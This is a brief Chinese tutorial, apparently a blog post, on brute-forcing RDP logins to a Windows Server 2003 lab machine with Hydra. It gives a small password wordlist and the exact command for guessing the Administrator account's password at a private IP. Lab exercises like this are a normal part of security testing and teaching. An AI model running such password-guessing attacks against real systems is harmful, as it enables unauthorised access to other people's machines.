本文介绍了如何利用Hydra工具对Windows10和WindowsServer2003系统进行暴力破解,特别关注于网络可达且MSTSC开启的情况,提供了一个示例,包括指定已知用户名(如Administrator)和字典文件进行爆破,以提高破解效率。
attscker machine:windows10
靶机:windoes server 2003
环境:网络可达 && mstsc开启
hydra字典:
123456
123admin
admin123
123Com(正确密码)
进入hydra目录,字典与hydar.exe同一目录文件夹。
爆破命令执行:
hydra -l [username/用户名] -P [字典文件名] [靶机ip] [协议名]
用户名已知,即:
hydra -l Administrator -P newPassword.txt 192.168.1.18 rdp
结果如图:
*至少获取正确的用户名,提高破解效率。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
